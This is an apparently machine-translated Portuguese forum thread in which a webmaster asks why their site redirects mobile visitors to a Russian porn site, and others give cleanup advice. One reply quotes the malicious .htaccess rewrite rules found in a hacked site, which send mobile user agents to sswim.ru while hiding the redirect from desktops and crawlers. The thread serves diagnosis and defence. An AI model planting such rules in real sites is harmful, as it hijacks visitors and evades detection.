A Central do Google para webmasters tem um site de ajuda que é um bom ponto de partida Aponte se seu site foi invadido ou tem malware.
Um site que eu possuo está redirecionando para um site pornô russo em todos os navegadores de celular (Opera, Android Default, Nokia Default) etc. mas não quando acessado de uma plataforma não móvel.
Alguma ideia do problema? Onde olhar?
A Central do Google para webmasters tem um site de ajuda que é um bom ponto de partida Aponte se seu site foi invadido ou tem malware.
Os invasores bem-sucedidos costumam injetar um pouco de JavaScript em todas as páginas encontradas no servidor, e esse código talvez verifique seu agente de usuário. Então, você pode localizá-lo, mesmo olhando apenas para o código-fonte no seu navegador. Também pode haver algum código do lado do servidor envolvido, que serve navegadores móveis com código especial (adicional). Especialmente se você tiver páginas separadas para navegadores móveis, isso pode causar um efeito diferente. Verifique o código exibido nos navegadores móveis falsificando o agente do usuário de um navegador móvel no navegador da área de trabalho. No Firefox você pode definir o valor de general.useragent.override para
Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B)
AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile
Safari/535.19
em about: config para falsificar um navegador Android. Desative o JavaScript no Firefox para impedir a execução do script suspeito. Se ainda não houver código JavaScript suspeito na origem, o redirecionamento provavelmente será causado por algum código de execução ou configuração do servidor. Nesse caso, verifique os arquivos .htaccess (se você estiver usando o Apache) e os scripts executáveis como * .php. Se você estiver usando scripts do lado do servidor, verifique sua integridade.
Em ambos os casos, você precisa descobrir como o seu site foi comprometido. Geralmente isso é feito explorando vulnerabilidades conhecidas em aplicativos da Web comuns (por exemplo, fóruns, CMS, ...). Certifique-se de ter corrigido todas as vulnerabilidades conhecidas instalando uma versão suficientemente recente. As senhas roubadas do sistema de desktop de um usuário comprometido também são um problema comum. Você também deve certificar-se de que revertê-lo de maneira confiável para um bom estado conhecido. Pode haver mais mudanças que você já conhece. Restaurar a partir de um backup limpo é a melhor solução, se você não puder confirmar a integridade de todos os seus arquivos no servidor.
Como Gurken disse, tente descobrir se há algum JS malicioso sendo injetado na página. Você está usando algum anúncio no site? Em caso afirmativo, o provedor de anúncios pode estar veiculando conteúdo diferente para dispositivos móveis & área de trabalho e ter algum conteúdo problemático nos anúncios para celular veiculados.
Por favor, localize e investigue seus arquivos ./htaccess
. No meu caso, o hack se parecia com o seguinte.
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
----I deleted several more lines here
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
RewriteRule ^(.*)$ http://sswim.ru [L,R=302]
# Use PHP5.3 Single php.ini as default
AddHandler application/x-httpd-php54s .php
OBSERVE A REGRA DE REESCREVA redirecionando para sswin.ru
!!!
E tenho certeza que este é apenas o começo da bagunça.
Eu verifiquei o arquivo .htaccess, mas não encontrei nenhum outro código além do código padrão do WordPress.
A outra pior coisa que vejo no meu site é que eles estão criando um número de arquivos PHP com nomes aleatórios, adicionando um código de uma linha em arquivos de índice. E continuo excluindo-os a cada 2 dias. Por exemplo meu site Zenharborspa.com
E o redirecionamento de páginas para outros sites quando acessado por navegadores móveis, enquanto o site funciona bem na área de trabalho. E sim o redirecionamento para algum SSWIN.RU.
Outra maneira de encontrar a causa raiz.